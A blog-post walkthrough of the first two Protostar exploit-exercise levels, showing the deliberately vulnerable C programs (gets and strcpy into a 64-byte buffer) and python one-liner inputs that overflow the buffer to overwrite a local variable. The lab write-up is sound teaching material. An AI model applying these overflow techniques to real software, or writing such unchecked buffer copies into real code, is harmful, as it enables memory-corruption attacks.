paulwalko.github.io/_posts/2016-06-14-nebula_exploit_e...

2.1 KiB

title layout category tags excerpt
Protostar Exploit Exercises Solutions 0-1 post writeup
exploit-exercises
protostar
hacking
Walkthrough for Protostar exercises on exploit-exercises.com

Stack 0

Here's what we're given:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The first thing I took note of is the size of the buffer: 64 bytes. After that, the program inputs text for buffer, and then checks to see if you modified the modified variable. I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:

$ echo `python -c 'print "A"*64'` | ./stack0
Try again?

That works as expected, now with 65 bytes:

$  echo `python -c 'print "A"*65'` | ./stack0      
you have changed the 'modified' variable

Solved!

Stack 1

Here's the code we're given:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Just like Stack 0, we're given a buffer array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal 0x61626364 instead of just changing it like before.

Keep in mind this is little endian, so I'll input the value in reverse order:

$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000

That works as expected, now with the additional bytes:

$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`    
you have correctly got the variable to the right value

Woo!